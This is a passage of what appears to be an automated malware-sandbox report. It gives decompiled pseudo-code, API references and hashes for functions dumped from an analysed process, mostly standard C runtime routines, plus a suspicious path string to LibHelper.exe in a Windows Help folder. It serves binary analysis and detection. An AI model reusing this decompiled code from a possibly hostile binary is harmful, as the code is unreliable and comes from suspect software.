						_t186 =  *((intOrPtr*)(0x10841d0 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t263 = _v80;
						_t212 = _t186 + 0x2e + _t263;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t271 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0x1083768)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t271;
							if(_t258 > _t271) {
								__eflags = _t271;
								if(_t271 <= 0) {
									goto L44;
								} else {
									_t282 = _v40;
									do {
										_t264 = _t243 + _t263;
										_t216 =  *((intOrPtr*)(_t243 + _t282));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x10841d0 + _v84 * 4)) + 0x2e)) = _t216;
										_t263 = _v80;
										__eflags = _t243 - _t271;
									} while (_t243 < _t271);
									goto L43;
								}
							} else {
								_t272 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t272;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t263 + _v52 + 0x2e) & 0x000000ff) + 0x1083768)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t271) {
								__eflags = _t271;
								if(_t271 > 0) {
									_t283 = _v40;
									do {
										_t266 = _t243 + _t263 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t283));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0x10841d0 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t263 = _v80;
										__eflags = _t243 - _t271;
									} while (_t243 < _t271);
									L43:
									_t278 = _v92;
								}
								L44:
								_t281 = _t278 + _t271;
								__eflags = _t281;
								L45:
								__eflags = _v60;
								_v92 = _t281;
							} else {
								_t263 = _t243;
								if(_t256 > 0) {
									_t285 = _v108;
									do {
										 *((char*)(_t286 + _t263 - 0xc)) =  *((intOrPtr*)(_t285 + _t263));
										_t263 = _t263 + 1;
									} while (_t263 < _t256);
									_t229 = _v52;
								}
								_t272 = _v40;
								if(_t229 > 0) {
									E01073160( &_v16 + _t256, _t272, _v52);
									_t256 = _v44;
									_t287 = _t287 + 0xc;
								}
								if(_t256 > 0) {
									_t263 = _v44;
									_t273 = _t243;
									_t284 = _v80;
									do {
										_t262 = _t273 + _t284;
										_t273 =  &(_t273->Internal);
										 *(_t262 +  *((intOrPtr*)(0x10841d0 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t273 < _t263);
									_t272 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E010799A4(_t260);
								_t288 = _t287 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t268 = _t272 + _v52 - 1;
									L31:
									_t268 = _t268 + 1;
									_v40 = _t268;
									_t193 = E01076308(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t287 = _t288 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t278 = _v88 - _v112 + _t268;
											_v92 = _t278;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t268 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t278 = _t278 + 1;
															_v92 = _t278;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t263 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t263 & 0x00000004;
						if((_t263 & 0x00000004) == 0) {
							_v33 =  *_t268;
							_t188 = E010777AB(_t263);
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t268);
								goto L30;
							} else {
								_t202 = _t268 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t263 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0x10841d0 + _t263 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0x10841d0 + _t263 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0x10841d0 + _t263 * 4)) + 0x2d) | 0x00000004;
									_t281 = _t278 + 1;
									goto L45;
								} else {
									_t206 = E010782B0( &_v76, _t268, 2);
									_t288 = _t287 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t268 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t263 = _t263 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t268;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t263;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E010782B0();
							_t288 = _t287 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t286;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E01071463(_v8 ^ _t286, _t263, _a4,  &_v96);
			}

0x01078c08
0x01078c0f
0x01078c12
0x01078c17
0x01078c1f
0x01078c22
0x01078c26
0x01078c29
0x01078c33
0x01078c3d
0x01078c3f
0x01078c42
0x01078c45
0x01078c4b
0x01078c4d
0x01078c54
0x01078c61
0x01078c62
0x01078c65
0x01078c68
0x01078c69
0x01078c6a
0x01078c6d
0x01078c72
0x01078f7e
0x01078f7e
0x01078c78
0x01078c78
0x01078c7b
0x01078c7d
0x01078c83
0x01078c86
0x01078c8d
0x01078c94
0x01078c9d
0x00000000
0x00000000
0x01078ca3
0x01078ca9
0x01078cab
0x01078cad
0x01078cb0
0x01078cb5
0x01078cb9
0x00000000
0x00000000
0x00000000
0x01078cb9
0x01078cbe
0x01078cc1
0x01078cc3
0x01078cc8
0x01078d7a
0x01078d7b
0x01078d7e
0x01078d80
0x01078f2e
0x01078f30
0x00000000
0x01078f32
0x01078f32
0x01078f35
0x01078f38
0x01078f41
0x01078f44
0x01078f45
0x01078f49
0x01078f4c
0x01078f4c
0x00000000
0x01078f50
0x01078d86
0x01078d86
0x01078d8b
0x01078d8e
0x01078d94
0x01078d9a
0x01078da3
0x01078da6
0x01078da6
0x01078da7
0x01078da8
0x01078dab
0x01078dac
0x00000000
0x01078dac
0x01078cce
0x01078cdd
0x01078cde
0x01078ce1
0x01078ce3
0x01078ce8
0x01078ef9
0x01078efb
0x01078efd
0x01078f00
0x01078f05
0x01078f0e
0x01078f11
0x01078f12
0x01078f16
0x01078f19
0x01078f1c
0x01078f1c
0x01078f20
0x01078f20
0x01078f20
0x01078f23
0x01078f23
0x01078f23
0x01078f25
0x01078f25
0x01078f29
0x01078cee
0x01078cee
0x01078cf2
0x01078cf4
0x01078cf7
0x01078cfa
0x01078cfe
0x01078cff
0x01078d03
0x01078d03
0x01078d06
0x01078d0b
0x01078d17
0x01078d1c
0x01078d1f
0x01078d1f
0x01078d24
0x01078d26
0x01078d29
0x01078d2b
0x01078d2e
0x01078d31
0x01078d34
0x01078d3c
0x01078d40
0x01078d44
0x01078d44
0x01078d4a
0x01078d50
0x01078d53
0x01078d5b
0x01078d62
0x01078d66
0x01078d67
0x01078d6a
0x01078d6b
0x01078daf
0x01078daf
0x01078db3
0x01078db4
0x01078db9
0x01078dbf
0x00000000
0x01078dc5
0x01078dc9
0x01078e52
0x01078e59
0x01078e61
0x01078e69
0x01078e6e
0x01078e71
0x01078e76
0x00000000
0x01078e7c
0x01078e91
0x01078f75
0x01078f7b
0x00000000
0x01078e97
0x01078ea0
0x01078ea2
0x01078ea8
0x00000000
0x01078eae
0x01078eb2
0x01078ee8
0x01078eeb
0x00000000
0x01078ef1
0x01078ef1
0x00000000
0x01078ef1
0x01078eb4
0x01078eb6
0x01078eb8
0x01078ed1
0x00000000
0x01078ed7
0x01078edb
0x00000000
0x01078ee1
0x01078ee1
0x01078ee4
0x01078ee5
0x00000000
0x01078ee5
0x01078edb
0x01078ed1
0x01078eb2
0x01078ea8
0x01078e91
0x01078e76
0x01078dbf
0x01078ce8
0x00000000
0x01078dd0
0x01078dd0
0x01078dd3
0x01078dd7
0x01078dda
0x01078dfc
0x01078dff
0x01078e04
0x01078e08
0x01078e0c
0x01078e3a
0x01078e3c
0x00000000
0x01078e0e
0x01078e0e
0x01078e11
0x01078e14
0x01078e17
0x01078f52
0x01078f55
0x01078f62
0x01078f6d
0x01078f72
0x00000000
0x01078e1d
0x01078e24
0x01078e29
0x01078e2c
0x01078e2f
0x00000000
0x01078e35
0x01078e35
0x00000000
0x01078e35
0x01078e2f
0x01078e17
0x01078ddc
0x01078de0
0x01078de3
0x01078de8
0x01078dee
0x01078df0
0x01078df7
0x01078e3d
0x01078e40
0x01078e41
0x01078e46
0x01078e49
0x01078e4c
0x00000000
0x00000000
0x00000000
0x00000000
0x01078e4c
0x00000000
0x01078dda
0x01078c7b
0x01078f81
0x01078f81
0x01078f83
0x01078f86
0x01078f86
0x01078f86
0x01078f86
0x01078f98
0x01078f9a
0x01078f9b
0x01078f9c
0x01078fa6

APIs

GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 01078C45
__fassign.LIBCMT ref: 01078E24
__fassign.LIBCMT ref: 01078E41
WriteFile.KERNEL32(?,01076EFA,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01078E89
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01078EC9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01078F75

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 144cfeb9a23824d64f730b1b71cfd2aa3e0dd0d44782894467a8436e5b44eb9c
Instruction ID: 42e7fd6a3c0aeb5a988cf86943e12a0db35a8ff725bf52fc90c925b2838f8f52
Opcode Fuzzy Hash: 144cfeb9a23824d64f730b1b71cfd2aa3e0dd0d44782894467a8436e5b44eb9c
Instruction Fuzzy Hash: 84D1BB71D002599FDF11CFE8C884AEDBBB5BF48304F28816AE995FB241D631A902CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01072A98, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01072A98(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x1083030 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E01072F5C(_t13, __eflags,  *0x1083030);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E01072F97(_t14, __eflags,  *0x1083030, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E01074C2D();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E01072F97(_t18, __eflags,  *0x1083030, 0);
								} else {
									_t8 = E01072F97(_t18, __eflags,  *0x1083030, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E010736D4(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x01072a98
0x01072a9f
0x01072ab2
0x01072ab9
0x01072abb
0x01072abc
0x01072abf
0x01072ad8
0x01072ad8
0x01072ac1
0x01072ac1
0x01072ac3
0x01072acd
0x01072ad4
0x01072ad6
0x01072add
0x01072ae6
0x01072ae9
0x01072aea
0x01072aec
0x01072b00
0x01072b00
0x01072b09
0x01072aee
0x01072af5
0x01072afb
0x01072afc
0x01072afe
0x01072b12
0x01072b14
0x01072b14
0x00000000
0x00000000
0x00000000
0x01072afe
0x01072b17
0x00000000
0x00000000
0x00000000
0x01072ad6
0x01072ac3
0x01072b1f
0x01072b29
0x01072aa1
0x01072aa3
0x01072aa3

APIs

GetLastError.KERNEL32(?,?,01072A8F,010721AA,01071CDF), ref: 01072AA6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01072AB4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01072ACD
SetLastError.KERNEL32(00000000,01072A8F,010721AA,01071CDF), ref: 01072B1F

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 472b810dcd556bc26d8c7fcf6800eaf6976142f2e4371a72b7b8999857ff08a0
Instruction ID: af87b838864bc6550b427b4b9efa7fa47523c3a6feabf8225815753991d22ad3
Opcode Fuzzy Hash: 472b810dcd556bc26d8c7fcf6800eaf6976142f2e4371a72b7b8999857ff08a0
Instruction Fuzzy Hash: AE012832B1D3126FA67529F8AC94B6A2B94FF51AB07300239F1E1991D4EF128802974C

Uniqueness

Uniqueness Score: -1.00%

Function 01072E03, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01072E03(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x1083cec + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x107dcb0 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E01074D38(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x01072e0a
0x01072e7e
0x01072e0f
0x01072e11
0x01072e18
0x01072e1c
0x01072e25
0x01072e34
0x01072e3d
0x01072e41
0x01072e8a
0x01072e8c
0x01072e90
0x01072e93
0x01072e93
0x01072e99
0x01072e99
0x01072e85
0x01072e89
0x01072e89
0x01072e43
0x01072e4c
0x01072e76
0x01072e79
0x01072e7b
0x01072e7b
0x00000000
0x01072e7b
0x01072e4e
0x01072e59
0x01072e5e
0x01072e63
0x00000000
0x00000000
0x01072e6a
0x01072e70
0x01072e74
0x00000000
0x00000000
0x00000000
0x01072e74
0x01072e21
0x00000000
0x00000000
0x00000000
0x01072e23
0x01072e83
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,01072EC4,?,?,01083C94,00000000,?,01072FEF,00000004,InitializeCriticalSectionEx,0107DDA4,InitializeCriticalSectionEx,00000000), ref: 01072E93

Strings

api-ms-, xrefs: 01072E53

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: b2de552de41a889eb589150fd2593bd16e2743211b515d38b48ac4807a0099bc
Instruction ID: 413fad05af24d4a09d1f717234781e021c953efe111715a89db65e461cff26f8
Opcode Fuzzy Hash: b2de552de41a889eb589150fd2593bd16e2743211b515d38b48ac4807a0099bc
Instruction Fuzzy Hash: 2911A332E01625ABDB735AAC9840B5D37D8AF017B0F150551F9C5FB284D775ED0087D9

Uniqueness

Uniqueness Score: -1.00%

Function 01073D2F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E01073D2F(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x107d170(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x01073d35
0x01073d39
0x01073d44
0x01073d4c
0x01073d57
0x01073d5d
0x01073d61
0x01073d68
0x01073d6e
0x01073d6e
0x01073d70
0x01073d75
0x00000000
0x01073d7a
0x01073d81

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,01073D24,?,?,01073CEC,?,?,?), ref: 01073D44
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01073D57
FreeLibrary.KERNEL32(00000000,?,?,01073D24,?,?,01073CEC,?,?,?), ref: 01073D7A

Strings

CorExitProcess, xrefs: 01073D4F
mscoree.dll, xrefs: 01073D3D

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 062e07221ffdee91f13bab1217d174b7a96242ce54113dc4f1296a6006436c89
Instruction ID: 225578bc2d3a5b9ca026255f10c3112e5198fb5bed34cf1e95530503e27530cb
Opcode Fuzzy Hash: 062e07221ffdee91f13bab1217d174b7a96242ce54113dc4f1296a6006436c89
Instruction Fuzzy Hash: 48F05E30E00218FBEB22ABE5EC09B9D7EB4AF00795F000095B581B6050CB758E01EB98

Uniqueness

Uniqueness Score: -1.00%

Function 01077626, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01077626(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x10836f8; // 0x1083748
					if(_t23 != 0) {
						E01074D72(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x10836fc; // 0x10843fc
					if(_t24 != 0) {
						E01074D72(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1083700; // 0x10843fc
					if(_t25 != 0) {
						E01074D72(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1083728; // 0x108374c
					if(_t26 != 0) {
						E01074D72(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x108372c; // 0x1084400
					if(_t27 != 0) {
						return E01074D72(_t6);
					}
				}
				return _t6;
			}

0x0107762c
0x01077631
0x01077635
0x0107763b
0x0107763e
0x01077643
0x01077647
0x0107764d
0x01077650
0x01077655
0x01077659
0x0107765f
0x01077662
0x01077667
0x0107766b
0x01077671
0x01077674
0x01077679
0x0107767a
0x0107767d
0x01077683
0x00000000
0x0107768b
0x01077683
0x0107768e

APIs

_free.LIBCMT ref: 0107763E

Part of subcall function 01074D72: HeapFree.KERNEL32(00000000,00000000,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?), ref: 01074D88
Part of subcall function 01074D72: GetLastError.KERNEL32(?,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?,?), ref: 01074D9A

_free.LIBCMT ref: 01077650
_free.LIBCMT ref: 01077662
_free.LIBCMT ref: 01077674
_free.LIBCMT ref: 01077686

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 87981a30dbe9ad8340206603f6173846d18565b8c1d1833909bdd3ff22ccdd4a
Instruction ID: e0be36770c549c475f319e4de1e89a3847fc7dc6e566430a23227ea3c8754304
Opcode Fuzzy Hash: 87981a30dbe9ad8340206603f6173846d18565b8c1d1833909bdd3ff22ccdd4a
Instruction Fuzzy Hash: B4F04F72C04641A79670FA6CE485D4B7BD9FA59B903544845E2C5DB604DB35FC80865C

Uniqueness

Uniqueness Score: -1.00%

Function 01073E01, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E01073E01(void* __edx, intOrPtr _a4) {
				signed int _v8;
				struct HINSTANCE__* _v12;
				char _v16;
				WCHAR* _v20;
				void* __ebx;
				void* __edi;
				WCHAR* _t25;
				WCHAR** _t35;
				WCHAR** _t36;
				WCHAR* _t39;
				WCHAR* _t41;
				WCHAR* _t42;
				intOrPtr* _t43;
				WCHAR** _t44;
				intOrPtr _t47;
				WCHAR* _t48;
				WCHAR* _t53;
				void* _t56;
				WCHAR** _t57;
				WCHAR* _t63;
				WCHAR* _t65;

				_t56 = __edx;
				_t47 = _a4;
				if(_t47 != 0) {
					__eflags = _t47 - 2;
					if(_t47 == 2) {
						L5:
						GetModuleFileNameW(0, 0x1083d20, 0x104);
						_t25 =  *0x10840ec; // 0xe21d40
						 *0x10840d8 = 0x1083d20;
						_v20 = _t25;
						__eflags = _t25;
						if(_t25 == 0) {
							L7:
							_t25 = 0x1083d20;
							_v20 = 0x1083d20;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t63 = E010740C5(E01073F30(_t25, 0, 0,  &_v8,  &_v16), _v8, _v16, 2);
							__eflags = _t63;
							if(__eflags != 0) {
								E01073F30(_v20, _t63, _t63 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t47 - 1;
								if(_t47 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t48 = E01075A17(_t47, _t56, 0, _t63);
									__eflags = _t48;
									if(_t48 == 0) {
										_t57 = _v12;
										_t53 = 0;
										_t35 = _t57;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											L17:
											_t36 = 0;
											 *0x10840dc = _t53;
											_v12 = 0;
											_t48 = 0;
											 *0x10840e4 = _t57;
											L18:
											E01074D72(_t36);
											_v12 = 0;
											L19:
											E01074D72(_t63);
											_t39 = _t48;
											L20:
											return _t39;
										} else {
											goto L16;
										}
										do {
											L16:
											_t35 =  &(_t35[1]);
											_t53 =  &(_t53[0]);
											__eflags =  *_t35;
										} while ( *_t35 != 0);
										goto L17;
									}
									_t36 = _v12;
									goto L18;
								}
								_t41 = _v8 - 1;
								__eflags = _t41;
								 *0x10840dc = _t41;
								_t42 = _t63;
								_t63 = 0;
								 *0x10840e4 = _t42;
								L12:
								_t48 = 0;
								goto L19;
							}
							_t43 = E01073958(__eflags);
							_push(0xc);
							_pop(0);
							 *_t43 = 0;
							goto L12;
						}
						__eflags =  *_t25;
						if( *_t25 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t47 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t44 = E01073958(__eflags);
					_t65 = 0x16;
					 *_t44 = _t65;
					E0107389B();
					_t39 = _t65;
					goto L20;
				}
				return 0;
			}

0x01073e01
0x01073e0a
0x01073e0f
0x01073e19
0x01073e1c
0x01073e39
0x01073e48
0x01073e4e
0x01073e53
0x01073e59
0x01073e5c
0x01073e5e
0x01073e65
0x01073e65
0x01073e67
0x01073e6a
0x01073e6d
0x01073e74
0x01073e8d
0x01073e92
0x01073e94
0x01073eb5
0x01073ebd
0x01073ec0
0x01073edb
0x01073ede
0x01073ee5
0x01073ee9
0x01073eeb
0x01073ef2
0x01073ef5
0x01073ef7
0x01073ef9
0x01073efb
0x01073f05
0x01073f05
0x01073f07
0x01073f0d
0x01073f10
0x01073f12
0x01073f18
0x01073f19
0x01073f1f
0x01073f22
0x01073f23
0x01073f29
0x01073f2c
0x00000000
0x00000000
0x00000000
0x00000000
0x01073efd
0x01073efd
0x01073efd
0x01073f00
0x01073f01
0x01073f01
0x00000000
0x01073efd
0x01073eed
0x00000000
0x01073eed
0x01073ec5
0x01073ec5
0x01073ec6
0x01073ecb
0x01073ecd
0x01073ecf
0x01073ed4
0x01073ed4
0x00000000
0x01073ed4
0x01073e96
0x01073e9b
0x01073e9d
0x01073e9e
0x00000000
0x01073e9e
0x01073e60
0x01073e63
0x00000000
0x00000000
0x00000000
0x01073e63
0x01073e1e
0x01073e21
0x00000000
0x00000000
0x01073e23
0x01073e2a
0x01073e2b
0x01073e2d
0x01073e32
0x00000000
0x01073e32
0x00000000

Strings

C:\Windows\Help\Windows\LibHelper.exe, xrefs: 01073E3F, 01073E46, 01073E7A

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\Help\Windows\LibHelper.exe
API String ID: 0-2763731058
Opcode ID: 085808598ad6abe789910fad5d4b52a09bb217fcb9db4f252e6235b3fb73cc75
Instruction ID: 0b75ba71f6866a18535db71cc2bc19f4ddd1b6e6a3953c2aafbb5e34a20cf136
Opcode Fuzzy Hash: 085808598ad6abe789910fad5d4b52a09bb217fcb9db4f252e6235b3fb73cc75
Instruction Fuzzy Hash: 5A31A071E04259EBEB22DF9D8884AAFBBF8FB94300B1044A6F5C1EB240D7719A41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0107A2A4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0107A2A4(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E010774BE(_t33) != 0xffffffff) {
					_t13 =  *0x10841d0; // 0xe36468
